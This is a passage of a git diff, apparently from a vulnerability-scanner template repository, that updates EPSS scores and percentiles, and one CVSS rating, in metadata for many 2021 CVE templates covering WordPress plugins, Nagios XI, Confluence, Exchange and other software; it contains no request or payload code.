cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index f412aef5b4..2708a400ae 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-25028 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:tri:event_tickets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index f497ba8925..f222b8c8fb 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25033 cwe-id: CWE-601 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:noptin:noptin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index be187b10fd..f13ccc1116 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25052 cwe-id: CWE-352 - epss-score: 0.02593 - epss-percentile: 0.89122 + epss-score: 0.01998 + epss-percentile: 0.87597 cpe: cpe:2.3:a:wow-company:button_generator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 5280b99151..9f383b4315 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25055 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:feedwordpress_project:feedwordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index a7d80c35e4..113e00c640 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25063 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 023ba7922c..38d5b6f86b 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25065 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28531 + epss-percentile: 0.285 cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index 19e1293e65..7251362214 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25067 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28531 + epss-percentile: 0.285 cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index 0e466e3ab9..24c00b1435 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25074 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index b50fb608af..c62b54bb8f 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25075 cwe-id: CWE-862 epss-score: 0.00071 - epss-percentile: 0.29167 + epss-percentile: 0.29136 cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index d53c182a5f..3d653c3a73 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-25078 cwe-id: CWE-79 epss-score: 0.00382 - epss-percentile: 0.70007 + epss-percentile: 0.70184 cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index d676dbeb15..6776d434c5 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25079 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:crmperks:contact_form_entries:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25085.yaml b/http/cves/2021/CVE-2021-25085.yaml index 4fce062510..8da1807f47 100644 --- a/http/cves/2021/CVE-2021-25085.yaml +++ b/http/cves/2021/CVE-2021-25085.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25085 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index f071bcdf28..d21954eb63 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25099 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25104.yaml b/http/cves/2021/CVE-2021-25104.yaml index a3985b2082..0f99791da1 100644 --- a/http/cves/2021/CVE-2021-25104.yaml +++ b/http/cves/2021/CVE-2021-25104.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-25104 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.49645 + epss-score: 0.00106 + epss-percentile: 0.42838 cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index c49f1fc24c..c86d97df2c 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25111 cwe-id: CWE-601 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index 7e767f2fee..ee401706c3 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25112 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40761 + epss-percentile: 0.40832 cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index b6d64bd09f..e5bdca385d 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-25114 cwe-id: CWE-89 epss-score: 0.04131 - epss-percentile: 0.91223 + epss-percentile: 0.9129 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 6a33cecbfe..d3733bc2a8 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-25118 cwe-id: CWE-200 epss-score: 0.00155 - epss-percentile: 0.51718 + epss-percentile: 0.51756 cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 7fc1d078f1..0186dd114a 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25120 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42757 + epss-percentile: 0.42838 cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-25281.yaml b/http/cves/2021/CVE-2021-25281.yaml index 6b98b43d54..8c02f5ea93 100644 --- a/http/cves/2021/CVE-2021-25281.yaml +++ b/http/cves/2021/CVE-2021-25281.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-25281 cwe-id: CWE-287 - epss-score: 0.74074 - epss-percentile: 0.97826 + epss-score: 0.85046 + epss-percentile: 0.98255 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 516f9f8f88..5b9d9ba288 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25296 cwe-id: CWE-78 - epss-score: 0.88868 - epss-percentile: 0.98428 + epss-score: 0.89514 + epss-percentile: 0.98511 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index 593bdd9622..9c6ef577a0 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25297 cwe-id: CWE-78 - epss-score: 0.88868 - epss-percentile: 0.98428 + epss-score: 0.89514 + epss-percentile: 0.98511 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 8596db30f3..71927a3f31 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25298 cwe-id: CWE-78 - epss-score: 0.97365 - epss-percentile: 0.99884 + epss-score: 0.97349 + epss-percentile: 0.9988 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25299.yaml b/http/cves/2021/CVE-2021-25299.yaml index 9946a9cc95..5e50c4aba2 100644 --- a/http/cves/2021/CVE-2021-25299.yaml +++ b/http/cves/2021/CVE-2021-25299.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-25299 cwe-id: CWE-79 epss-score: 0.96845 - epss-percentile: 0.99617 + epss-percentile: 0.99626 cpe: cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 7efb979fd6..3f64b23dd3 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-25646 cwe-id: CWE-732 - epss-score: 0.97242 - epss-percentile: 0.99806 + epss-score: 0.97324 + epss-percentile: 0.99865 cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index f6cbdaedea..9c3c7a5ecc 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-25864 cwe-id: CWE-22 - epss-score: 0.35089 - epss-percentile: 0.96709 + epss-score: 0.33276 + epss-percentile: 0.96644 cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index 8621f055ef..c18a4a6fd3 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 - epss-score: 0.50653 - epss-percentile: 0.9723 + epss-score: 0.53647 + epss-percentile: 0.9732 cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index f243a01b34..e9693c61f4 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-26084 cwe-id: CWE-917 - epss-score: 0.9723 - epss-percentile: 0.998 + epss-score: 0.97235 + epss-percentile: 0.99808 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 13 diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index cfd93f3dd6..f100de1f1e 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-26085 cwe-id: CWE-425 epss-score: 0.96595 - epss-percentile: 0.99522 + epss-percentile: 0.99535 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index 705903edb3..3cd74e063e 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-26086 cwe-id: CWE-22 epss-score: 0.54993 - epss-percentile: 0.97328 + epss-percentile: 0.97354 cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26247.yaml b/http/cves/2021/CVE-2021-26247.yaml index e6562d0bd9..f543c817da 100644 --- a/http/cves/2021/CVE-2021-26247.yaml +++ b/http/cves/2021/CVE-2021-26247.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-26247 cwe-id: CWE-79 epss-score: 0.00255 - epss-percentile: 0.63157 + epss-percentile: 0.63314 cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26294.yaml b/http/cves/2021/CVE-2021-26294.yaml index 2367e49098..b76de0ac52 100644 --- a/http/cves/2021/CVE-2021-26294.yaml +++ b/http/cves/2021/CVE-2021-26294.yaml @@ -14,8 +14,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-26294 cwe-id: CWE-22 - epss-score: 0.23433 - epss-percentile: 0.96094 + epss-score: 0.23427 + epss-percentile: 0.96125 cpe: cpe:2.3:a:afterlogic:aurora:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-26295.yaml b/http/cves/2021/CVE-2021-26295.yaml index 06942a1a19..1ca29241ba 100644 --- a/http/cves/2021/CVE-2021-26295.yaml +++ b/http/cves/2021/CVE-2021-26295.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-26295 cwe-id: CWE-502 - epss-score: 0.97455 - epss-percentile: 0.99952 + epss-score: 0.97458 + epss-percentile: 0.99953 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-26475.yaml b/http/cves/2021/CVE-2021-26475.yaml index d7e81303b4..87e3d2a13b 100644 --- a/http/cves/2021/CVE-2021-26475.yaml +++ b/http/cves/2021/CVE-2021-26475.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-26475 cwe-id: CWE-79 epss-score: 0.00187 - epss-percentile: 0.5584 + epss-percentile: 0.56008 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26598.yaml b/http/cves/2021/CVE-2021-26598.yaml index 5840f63c30..62731e74e6 100644 --- a/http/cves/2021/CVE-2021-26598.yaml +++ b/http/cves/2021/CVE-2021-26598.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-26598 cwe-id: CWE-287 epss-score: 0.00506 - epss-percentile: 0.7379 + epss-percentile: 0.7392 cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index 6180173599..5b34195531 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-26702 cwe-id: CWE-79 epss-score: 0.00187 - epss-percentile: 0.5584 + epss-percentile: 0.56008 cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26710.yaml b/http/cves/2021/CVE-2021-26710.yaml index ae9983170b..73ce9b261e 100644 --- a/http/cves/2021/CVE-2021-26710.yaml +++ b/http/cves/2021/CVE-2021-26710.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-26710 cwe-id: CWE-79 epss-score: 0.00114 - epss-percentile: 0.44583 + epss-percentile: 0.44671 cpe: cpe:2.3:a:redwood:report2web:4.3.4.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26723.yaml b/http/cves/2021/CVE-2021-26723.yaml index 725f1c53d8..ba55ef897c 100644 --- a/http/cves/2021/CVE-2021-26723.yaml +++ b/http/cves/2021/CVE-2021-26723.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-26723 cwe-id: CWE-79 epss-score: 0.07461 - epss-percentile: 0.93407 + epss-percentile: 0.93454 cpe: cpe:2.3:a:jenzabar:jenzabar:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index 03387353fa..4d0b4be164 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-26812 cwe-id: CWE-79 - epss-score: 0.00467 - epss-percentile: 0.72769 + epss-score: 0.00464 + epss-percentile: 0.72797 cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 0cdbd6698e..2cb6c3eafa 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -15,12 +15,12 @@ info: - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09 - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 cve-id: CVE-2021-26855 cwe-id: CWE-918 - epss-score: 0.9753 - epss-percentile: 0.9999 + epss-score: 0.97468 + epss-percentile: 0.99958 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 98eeddd419..3526ee2733 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 - epss-score: 0.02262 - epss-percentile: 0.88405 + epss-score: 0.01677 + epss-percentile: 0.86307 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index 3852e6ca8b..2a814c7c7c 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ b/http/cves/2021/CVE-2021-27132.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-27132 cwe-id: CWE-74 epss-score: 0.02853 - epss-percentile: 0.89613 + epss-percentile: 0.8967 cpe: cpe:2.3:o:sercomm:agcombo_vd625_firmware:agsot_2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27309.yaml b/http/cves/2021/CVE-2021-27309.yaml index 6c4ecc0816..cb25e819d8 100644 --- a/http/cves/2021/CVE-2021-27309.yaml +++ b/http/cves/2021/CVE-2021-27309.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27309 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42781 + epss-percentile: 0.42863 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27310.yaml b/http/cves/2021/CVE-2021-27310.yaml index 20725cc620..61e271ed89 100644 --- a/http/cves/2021/CVE-2021-27310.yaml +++ b/http/cves/2021/CVE-2021-27310.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-27310 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42781 + epss-percentile: 0.42863 cpe: cpe:2.3:a:csphere:clansphere:2011.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27314.yaml b/http/cves/2021/CVE-2021-27314.yaml index 0b220fd078..9f58cb69c8 100644 --- a/http/cves/2021/CVE-2021-27314.yaml +++ b/http/cves/2021/CVE-2021-27314.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27314 cwe-id: CWE-89 - epss-score: 0.31857 - epss-percentile: 0.96559 + epss-score: 0.2719 + epss-percentile: 0.96343 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27315.yaml b/http/cves/2021/CVE-2021-27315.yaml index 2d6e57ea30..8d5a61e593 100644 --- a/http/cves/2021/CVE-2021-27315.yaml +++ b/http/cves/2021/CVE-2021-27315.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27315 cwe-id: CWE-89 epss-score: 0.08052 - epss-percentile: 0.93644 + epss-percentile: 0.93683 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27316.yaml b/http/cves/2021/CVE-2021-27316.yaml index 3508a942a3..2243d4b648 100644 --- a/http/cves/2021/CVE-2021-27316.yaml +++ b/http/cves/2021/CVE-2021-27316.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27316 cwe-id: CWE-89 epss-score: 0.08052 - epss-percentile: 0.93644 + epss-percentile: 0.93683 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27319.yaml b/http/cves/2021/CVE-2021-27319.yaml index 1212f12465..e8efb6a463 100644 --- a/http/cves/2021/CVE-2021-27319.yaml +++ b/http/cves/2021/CVE-2021-27319.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27319 cwe-id: CWE-89 epss-score: 0.08052 - epss-percentile: 0.93644 + epss-percentile: 0.93683 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index 92be1a6282..c6f13d9a71 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-27320 cwe-id: CWE-89 epss-score: 0.09267 - epss-percentile: 0.9407 + epss-percentile: 0.94102 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27330.yaml b/http/cves/2021/CVE-2021-27330.yaml index b6e9883025..ac23f4cb93 100644 --- a/http/cves/2021/CVE-2021-27330.yaml +++ b/http/cves/2021/CVE-2021-27330.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27330 cwe-id: CWE-79 epss-score: 0.00437 - epss-percentile: 0.71856 + epss-percentile: 0.72015 cpe: cpe:2.3:a:triconsole:datepicker_calendar:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27358.yaml b/http/cves/2021/CVE-2021-27358.yaml index 2ee9310909..4c4ef13e76 100644 --- a/http/cves/2021/CVE-2021-27358.yaml +++ b/http/cves/2021/CVE-2021-27358.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27358 cwe-id: CWE-306 epss-score: 0.02992 - epss-percentile: 0.89823 + epss-percentile: 0.89874 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27519.yaml b/http/cves/2021/CVE-2021-27519.yaml index c1cd578062..fba562d48a 100644 --- a/http/cves/2021/CVE-2021-27519.yaml +++ b/http/cves/2021/CVE-2021-27519.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27519 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.5946 + epss-percentile: 0.59618 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27520.yaml b/http/cves/2021/CVE-2021-27520.yaml index 061740b7e1..3528d2bea8 100644 --- a/http/cves/2021/CVE-2021-27520.yaml +++ b/http/cves/2021/CVE-2021-27520.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-27520 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.5946 + epss-percentile: 0.59618 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27561.yaml b/http/cves/2021/CVE-2021-27561.yaml index 4fc550b1df..dd1b0badbc 100644 --- a/http/cves/2021/CVE-2021-27561.yaml +++ b/http/cves/2021/CVE-2021-27561.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27561 cwe-id: CWE-78 - epss-score: 0.97456 - epss-percentile: 0.99952 + epss-score: 0.97434 + epss-percentile: 0.99939 cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27651.yaml b/http/cves/2021/CVE-2021-27651.yaml index 6513fb4331..2362a2ecff 100644 --- a/http/cves/2021/CVE-2021-27651.yaml +++ b/http/cves/2021/CVE-2021-27651.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27651 cwe-id: CWE-287 - epss-score: 0.04652 - epss-percentile: 0.91698 + epss-score: 0.04655 + epss-percentile: 0.9176 cpe: cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml index 